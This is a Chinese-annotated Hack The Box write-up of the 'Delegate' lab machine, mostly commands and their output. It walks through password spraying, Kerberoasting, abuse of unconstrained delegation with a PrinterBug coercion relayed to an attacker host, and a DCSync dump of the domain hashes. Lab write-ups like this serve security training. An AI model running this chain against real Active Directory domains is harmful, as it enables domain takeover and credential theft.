Redelegate
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# nmap 10.129.234.69 -p 88,135,139,389,445,464,593,636,3268,3389,5985,9389 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-14 09:38 EDT
Nmap scan report for DC1.delegate.vl (10.129.234.69)
Host is up (0.059s latency).
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-14 13:38:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: DELEGATE
| NetBIOS_Domain_Name: DELEGATE
| NetBIOS_Computer_Name: DC1
| DNS_Domain_Name: delegate.vl
| DNS_Computer_Name: DC1.delegate.vl
| DNS_Tree_Name: delegate.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-10-14T13:38:46+00:00
|_ssl-date: 2025-10-14T13:39:25+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Not valid before: 2025-10-13T13:28:14
|_Not valid after: 2026-04-14T13:28:14
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-10-14T13:38:46
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.54 seconds
1.1.2. RID Cycling
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# nxc smb dc1.delegate.vl -u 'guset' -p '' --rid-brute
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.69 445 DC1 [+] delegate.vl\guset: (Guest)
SMB 10.129.234.69 445 DC1 498: DELEGATE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.234.69 445 DC1 500: DELEGATE\Administrator (SidTypeUser)
SMB 10.129.234.69 445 DC1 501: DELEGATE\Guest (SidTypeUser)
SMB 10.129.234.69 445 DC1 502: DELEGATE\krbtgt (SidTypeUser)
SMB 10.129.234.69 445 DC1 512: DELEGATE\Domain Admins (SidTypeGroup)
SMB 10.129.234.69 445 DC1 513: DELEGATE\Domain Users (SidTypeGroup)
SMB 10.129.234.69 445 DC1 514: DELEGATE\Domain Guests (SidTypeGroup)
SMB 10.129.234.69 445 DC1 515: DELEGATE\Domain Computers (SidTypeGroup)
SMB 10.129.234.69 445 DC1 516: DELEGATE\Domain Controllers (SidTypeGroup)
SMB 10.129.234.69 445 DC1 517: DELEGATE\Cert Publishers (SidTypeAlias)
SMB 10.129.234.69 445 DC1 518: DELEGATE\Schema Admins (SidTypeGroup)
SMB 10.129.234.69 445 DC1 519: DELEGATE\Enterprise Admins (SidTypeGroup)
SMB 10.129.234.69 445 DC1 520: DELEGATE\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.234.69 445 DC1 521: DELEGATE\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.234.69 445 DC1 522: DELEGATE\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.234.69 445 DC1 525: DELEGATE\Protected Users (SidTypeGroup)
SMB 10.129.234.69 445 DC1 526: DELEGATE\Key Admins (SidTypeGroup)
SMB 10.129.234.69 445 DC1 527: DELEGATE\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.234.69 445 DC1 553: DELEGATE\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.234.69 445 DC1 571: DELEGATE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.234.69 445 DC1 572: DELEGATE\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.234.69 445 DC1 1000: DELEGATE\DC1$ (SidTypeUser)
SMB 10.129.234.69 445 DC1 1101: DELEGATE\DnsAdmins (SidTypeAlias)
SMB 10.129.234.69 445 DC1 1102: DELEGATE\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.234.69 445 DC1 1104: DELEGATE\A.Briggs (SidTypeUser)
SMB 10.129.234.69 445 DC1 1105: DELEGATE\b.Brown (SidTypeUser)
SMB 10.129.234.69 445 DC1 1106: DELEGATE\R.Cooper (SidTypeUser)
SMB 10.129.234.69 445 DC1 1107: DELEGATE\J.Roberts (SidTypeUser)
SMB 10.129.234.69 445 DC1 1108: DELEGATE\N.Thompson (SidTypeUser)
SMB 10.129.234.69 445 DC1 1121: DELEGATE\delegation admins (SidTypeGroup)
1.1.3. SMB
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# nxc smb dc1.delegate.vl -u 'guset' -p '' --shares
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.69 445 DC1 [+] delegate.vl\guset: (Guest)
SMB 10.129.234.69 445 DC1 [*] Enumerated shares
SMB 10.129.234.69 445 DC1 Share Permissions Remark
SMB 10.129.234.69 445 DC1 ----- ----------- ------
SMB 10.129.234.69 445 DC1 ADMIN$ Remote Admin
SMB 10.129.234.69 445 DC1 C$ Default share
SMB 10.129.234.69 445 DC1 IPC$ READ Remote IPC
SMB 10.129.234.69 445 DC1 NETLOGON READ Logon server share
SMB 10.129.234.69 445 DC1 SYSVOL READ Logon server share
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# impacket-smbclient guset@dc1.delegate.vl -dc-ip 10.129.234.69 -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# ls
[-] No share selected
# dir
*** Unknown syntax: dir
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
# use netlogon
# ls
drw-rw-rw- 0 Sun Oct 1 05:08:32 2023 .
drw-rw-rw- 0 Sun Oct 1 05:08:32 2023 ..
-rw-rw-rw- 159 Sun Oct 1 05:08:32 2023 users.bat
# get users.bat
# exit
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# ls -l
total 20
-rw-r--r-- 1 root root 3354 Oct 14 09:31 competitive_C1trus33.ovpn
-rw-r--r-- 1 root root 50 Oct 14 09:37 hosts
-rw-r--r-- 1 root root 14 Oct 14 09:31 notes
-rw-r--r-- 1 root root 679 Oct 14 09:36 ports
-rw-r--r-- 1 root root 159 Oct 14 09:50 users.bat
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# cat users.bat
rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
1.1.4. 密码喷涂
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# nxc smb dc1.delegate.vl -u users.txt -p 'P4ssw0rd1#123'
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.69 445 DC1 [-] delegate.vl\Administrator:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB 10.129.234.69 445 DC1 [-] delegate.vl\Guest:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB 10.129.234.69 445 DC1 [-] delegate.vl\krbtgt:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB 10.129.234.69 445 DC1 [-] delegate.vl\DC1$:P4ssw0rd1#123 STATUS_LOGON_FAILURE
SMB 10.129.234.69 445 DC1 [+] delegate.vl\A.Briggs:P4ssw0rd1#123
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# targetedKerberoast.py -v -d delegate.vl -u A.Briggs -p 'P4ssw0rd1#123' --dc-host 10.129.234.69
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$4b06c0cbfa7854207bc98c76a5c40ba3$4b8d17b4fbbc196016f1c5f2decad916fc166e97b86c94439ae0eeb25fcdb02ade05c128b41ef416b06a0dab1d16d09b5015fb2f83f93b0f62642b8fa95ef7caeb90673c7a1ed63b7c2e5d36357a3de2429055bbe2eced4e3bd40a3e7c291b0beaec0d3ab24fbd06aee76a118e7cb0453e913a2b499081b77180466986b2e70fb7a7525fa21b308424db9731db846474858dcbcba94373d5cc29648d346da3ce53cd9ec4fe08682d886f58814dc073e8c01ba646e4db458a36cfdd67bfa220fbbd4a918b851faa38aa9c33e92b349030b8dcdbfe28242d79225cb42b04ea1597654a0fb0d1a26e329eeb4cadf68126877579b47b5fe61af391ad695429d9d50e1605cad940723023ecaa27f08c1cb2934111bf24826d7c67434883f55ad5e745aa9136746d24484ad2638bf369acdcef0b7a99fe0c61f537b2b8da92530f8b87440db58f8ead2a1842193b07b34756252598ce6cdc4937526f1e4985f8226c7465e474b31da9e4b1d4641e7171447e2419fb304118c9767ff3d28a053c5d669890724b25921fef150b0c27660c9ea719d94f899a5160b242f62d0b9c1e2288396bd673cc024628b9741675d0189becd3a82e155622c2d4f3cd3ddf70cbf571e90812eaa9e9d01bd4fe635f8cc9b358dfacec1f311eede4d135f19a82b14ad4900c1ff1e6dc9686539f9df18dade0ca937dc8ef0842f475e330299a030b1a29b3f975f8073e3168cf3c3c10c56aca59f0c56745e8f9e476da13c43d3ccf8fababca4194af19667b4702e2ce737faeea77c487cd224bef1905e94c308d8b4ad4b316b48f29b0d04282576020f71971014f7016dbd99a8a8368754294caee1c52ccab83a23173c7def40f5a28e5f9e1d33e358ec52a87a77e18e79f2f3727c3ac94802f8025ec43440bb9345d01bececd4a6190534d198089a00b6623740aa9f4fc6df65ee98f4788ae839943e56da1c41dc246a368db045ffd8aa7da16e61b201fc0db45c229a9be03710790bea0ae2a5927f7e51497b222b093bd25d811c5fb5c000027d5fcda54b9414b5376be5b980ece2168fafe4bcaf393c69ab7aca0b19f4f5c7d02b8d74d2678931f6dee19f177b491bce70916f51a80ba76e4dfefa478ef175d8ecadd3e0f52bc6a79acbb2134320f7d8c8a9e3c7046b8925d08836f9f9bfd390a61b0d97574e18b92edf0eaa81f9c4a0de2747127bce5a915457a1eae4d829fddb9a864f337ad77e11073356b34ed7553e3f50fc1974099195340e53fef4be8ae5147e7e3279c432314617ddeadb306664c5dd62f60939da64b62af39aea93edb80dea964c60dfb6ba4c74f53510216dc54fe1f19ed1700565f63ff837125c1afc94f988f82f0fbe71772a85be8629d15fe042779ac68fa4ef1eaa9b0eb372415b3293c12f266c7ca75cbab3bc34bd2f8e727ec200628b30e4af984ca30729702
[VERBOSE] SPN removed successfully for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$4b06c0cbfa7854207bc98c76a5c40ba3$4b8d17b4fbbc196016f1c5f2decad916fc166e97b86c94439ae0eeb25fcdb02ade05c128b41ef416b06a0dab1d16d09b5015fb2f83f93b0f62642b8fa95ef7caeb90673c7a1ed63b7c2e5d36357a3de2429055bbe2eced4e3bd40a3e7c291b0beaec0d3ab24fbd06aee76a118e7cb0453e913a2b499081b77180466986b2e70fb7a7525fa21b308424db9731db846474858dcbcba94373d5cc29648d346da3ce53cd9ec4fe08682d886f58814dc073e8c01ba646e4db458a36cfdd67bfa220fbbd4a918b851faa38aa9c33e92b349030b8dcdbfe28242d79225cb42b04ea1597654a0fb0d1a26e329eeb4cadf68126877579b47b5fe61af391ad695429d9d50e1605cad940723023ecaa27f08c1cb2934111bf24826d7c67434883f55ad5e745aa9136746d24484ad2638bf369acdcef0b7a99fe0c61f537b2b8da92530f8b87440db58f8ead2a1842193b07b34756252598ce6cdc4937526f1e4985f8226c7465e474b31da9e4b1d4641e7171447e2419fb304118c9767ff3d28a053c5d669890724b25921fef150b0c27660c9ea719d94f899a5160b242f62d0b9c1e2288396bd673cc024628b9741675d0189becd3a82e155622c2d4f3cd3ddf70cbf571e90812eaa9e9d01bd4fe635f8cc9b358dfacec1f311eede4d135f19a82b14ad4900c1ff1e6dc9686539f9df18dade0ca937dc8ef0842f475e330299a030b1a29b3f975f8073e3168cf3c3c10c56aca59f0c56745e8f9e476da13c43d3ccf8fababca4194af19667b4702e2ce737faeea77c487cd224bef1905e94c308d8b4ad4b316b48f29b0d04282576020f71971014f7016dbd99a8a8368754294caee1c52ccab83a23173c7def40f5a28e5f9e1d33e358ec52a87a77e18e79f2f3727c3ac94802f8025ec43440bb9345d01bececd4a6190534d198089a00b6623740aa9f4fc6df65ee98f4788ae839943e56da1c41dc246a368db045ffd8aa7da16e61b201fc0db45c229a9be03710790bea0ae2a5927f7e51497b222b093bd25d811c5fb5c000027d5fcda54b9414b5376be5b980ece2168fafe4bcaf393c69ab7aca0b19f4f5c7d02b8d74d2678931f6dee19f177b491bce70916f51a80ba76e4dfefa478ef175d8ecadd3e0f52bc6a79acbb2134320f7d8c8a9e3c7046b8925d08836f9f9bfd390a61b0d97574e18b92edf0eaa81f9c4a0de2747127bce5a915457a1eae4d829fddb9a864f337ad77e11073356b34ed7553e3f50fc1974099195340e53fef4be8ae5147e7e3279c432314617ddeadb306664c5dd62f60939da64b62af39aea93edb80dea964c60dfb6ba4c74f53510216dc54fe1f19ed1700565f63ff837125c1afc94f988f82f0fbe71772a85be8629d15fe042779ac68fa4ef1eaa9b0eb372415b3293c12f266c7ca75cbab3bc34bd2f8e727ec200628b30e4af984ca30729702:KALEB_2341
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.T...729702
Time.Started.....: Tue Oct 14 22:12:24 2025 (1 sec)
Time.Estimated...: Tue Oct 14 22:12:25 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 15976.7 kH/s (6.18ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11010048/14344388 (76.76%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 10223616/14344388 (71.27%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: alisonpanda -> Joywang328
Hardware.Mon.#01.: Temp: 50c Util: 27% Core:1890MHz Mem:8001MHz Bus:8
1.3. winrm
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# evil-winrm -i delegate.vl -u N.Thompson -p KALEB_2341
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
2. System
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
>>>> SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
存在 SeEnableDelegationPrivilege 权限,可以用来打委派
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# nxc ldap delegate.vl -u N.Thompson -p KALEB_2341 -M maq
LDAP 10.129.234.69 389 DC1 [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.69 389 DC1 [+] delegate.vl\N.Thompson:KALEB_2341
MAQ 10.129.234.69 389 DC1 [*] Getting the MachineAccountQuota
>>>> MAQ 10.129.234.69 389 DC1 MachineAccountQuota: 10
用 impacket-addcomputer 新建计算机
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# impacket-addcomputer 'delegate.vl/N.Thompson:KALEB_2341' -computer-name hack -computer-pass Admin123 -dc-ip 10.129.234.69
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account hack$ with password Admin123.
使用 dnstool.py 添加DNS记录
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# dnstool.py -u 'delegate.vl\hack$' -p 'Admin123' --action add -r hack.delegate.vl -d 10.10.14.69 --type A -dns-ip 10.129.234.69
dc1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# dnstool.py -u 'delegate.vl\hack$' -p Admin123 -r hack.delegate.vl -d 10.10.14.69 --action add DC1.delegate.vl -dns-ip 10.129.234.69 --allow-multiple
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding extra record
[+] LDAP operation completed successfully
nslookup 看一下
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# nslookup hack.delegate.vl dc1.delegate.vl
Server: dc1.delegate.vl
Address: 10.129.234.69#53
>>>> Name: hack.delegate.vl
>>>> Address: 10.10.14.69
再用 addspn.py 给机器分配一个spn,不然后面利用会失败
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'ldap/hack.delegate.vl' -t 'hack$' -dc-ip 10.129.234.69 dc1.delegate.vl --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
再用 bloodyAD 配置非约束委派
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# bloodyAD --host dc1.delegate.vl -d delegate.vl -u N.Thompson -p KALEB_2341 add uac 'hack$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to hack$'s userAccountControl
可以查询下是否配置成功
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-ADComputer hack -Properties TrustedForDelegation | Select-Object Name, TrustedForDelegation
Name TrustedForDelegation
---- --------------------
hack True
也可以用 bloodyAD 查看
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# bloodyAD --host dc1.delegate.vl -d delegate.vl -u N.Thompson -p KALEB_2341 get object 'hack$' |grep userAccountControl
>>>> userAccountControl: WORKSTATION_TRUST_ACCOUNT; TRUSTED_FOR_DELEGATION
然后进行 NTLMRelay
先计算我们创建机器的哈希
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# python -c "password = 'Admin123'; import hashlib; print(hashlib.new('md4', password.encode('utf-16le')).hexdigest())"
e45a314c664d40a227f9540121d1a29d
开启监听
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# krbrelayx.py -hashes :e45a314c664d40a227f9540121d1a29d
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
这里可以用 Coercer 或者 [nxc集成的模块](Fetching Title#f5vg)来进行检测利用
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# nxc smb dc1.delegate.vl -u 'hack$' -p Admin123 -M coerce_plus
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.69 445 DC1 [+] delegate.vl\hack$:Admin123
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, DFSCoerce
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, PetitPotam
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, PrinterBug
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, PrinterBug
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, MSEven
存在好几个强制认证的漏洞,随便选一个即可
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# nxc smb dc1.delegate.vl -u 'hack$' -p Admin123 -M coerce_plus -o L=10.10.14.69 M=PrinterBug
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.69 445 DC1 [+] delegate.vl\hack$:Admin123
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, PrinterBug
COERCE_PLUS 10.129.234.69 445 DC1 Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx
这里多次利用都没有收到tgt.
换配套的工具 printerbug.py 成功relay
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# printerbug.py -hashes :e45a314c664d40a227f9540121d1a29d 'delegate.vl/hack$@dc1.delegate.vl' hack.delegate.vl
[*] Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# krbrelayx.py -hashes :e45a314c664d40a227f9540121d1a29d
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.234.69
>>>> [*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
>>>> [*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.129.234.69
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.69
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.69
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.129.234.69
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.69
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
coercer coerce -l 10.10.14.69 -t 10.129.234.69 -u 'hack$' -p 'Admin123' -d delegate.vl
2.2. DCSync
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# export KRB5CCNAME=DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
┌──(root㉿kali)-[~/Desktop/htb/Delegate]
└─# nxc smb delegate.vl -k --use-kcache --ntds
SMB delegate.vl 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB delegate.vl 445 DC1 [+] DELEGATE.VL\DC1$ from ccache
SMB delegate.vl 445 DC1 [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB delegate.vl 445 DC1 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB delegate.vl 445 DC1 Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
SMB delegate.vl 445 DC1 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB delegate.vl 445 DC1 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
SMB delegate.vl 445 DC1 A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3:::
SMB delegate.vl 445 DC1 b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6:::
SMB delegate.vl 445 DC1 R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1:::
SMB delegate.vl 445 DC1 J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f:::
SMB delegate.vl 445 DC1 N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe:::
SMB delegate.vl 445 DC1 DC1$:1000:aad3b435b51404eeaad3b435b51404ee:f7caf5a3e44bac110b9551edd1ddfa3c:::
SMB delegate.vl 445 DC1 hack$:4601:aad3b435b51404eeaad3b435b51404ee:e45a314c664d40a227f9540121d1a29d:::
SMB delegate.vl 445 DC1 [+] Dumped 10 NTDS hashes to /root/.nxc/logs/ntds/delegate.vl_None_2025-10-14_115731.ntds of which 8 were added to the database
SMB delegate.vl 445 DC1 [*] To extract only enabled accounts from the output file, run the following command:
SMB delegate.vl 445 DC1 [*] cat /root/.nxc/logs/ntds/delegate.vl_None_2025-10-14_115731.ntds | grep -iv disabled | cut -d ':' -f1
SMB delegate.vl 445 DC1 [*] grep -iv disabled /root/.nxc/logs/ntds/delegate.vl_None_2025-10-14_115731.ntds | cut -d ':' -f1